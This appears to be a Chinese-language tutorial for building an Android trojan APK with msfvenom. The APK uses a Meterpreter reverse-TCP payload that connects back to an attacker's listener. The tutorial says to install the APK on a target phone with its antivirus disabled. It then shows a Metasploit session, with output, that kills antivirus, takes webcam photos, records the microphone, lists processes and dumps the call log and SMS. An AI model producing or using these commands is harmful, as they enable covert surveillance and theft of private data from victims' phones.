第一步:用ifconfig命令查看本机ip地址
第二步:用msfvenom -p命令生成apk木马文件
具体命令为
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk
说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的地址和名字,apk为安卓可执行程序文件。
第三步:将生成的apk安装到要渗透的手机上,最好将手机的杀毒关闭,以免被杀掉。
第四步:Kali上打开metasploit进行渗透
具体操作过程为:
msfconsole //开启测试框架
msf6 > use multi/handler //调用模块
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp //使用之前设置的攻击安卓手机的payload
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.101.7 //设置本机IP地址进行监听
lhost => 192.168.101.7
msf6 exploit(multi/handler) > set lport 8848 //设置本机监听端口要与刚刚的一致
lport => 8848
msf6 exploit(multi/handler) > run // 执行后点击手机上安装的病毒程序
[*] Started reverse TCP handler on 192.168.101.7:8848
[*] Sending stage (76781 bytes) to 192.168.101.7
第五步:就可以进行操作了(手机要同意权限的获取)
meterpreter > run killav //先关闭软杀
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
meterpreter > webcam_snap // 拍摄照片
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/hAwvlKIu.jpeg
meterpreter > ps //查看安卓机中的进程
Process List
============
PID Name User
--- ---- ----
1 /init root
2 kthreadd root
3 ksoftirqd/0 root
5 kworker/0:0H root
7 migration/0 root
8 rcu_preempt root
9 rcu_bh root
10 rcu_sched root
11 migration/1 root
12 ksoftirqd/1 root
14 kworker/1:0H root
。。。。。。
meterpreter > record_mic //拍摄视频
[*] Starting...
[*] Stopped
Audio saved to: /root/psbfvTsR.wav
meterpreter > dump_calllog //获取通讯录
[*] Fetching 33 entries
[*] Call log saved to calllog_dump_20210212134522.txt
meterpreter > dump_sms // 获取短信
[*] No sms messages were found! //没有短信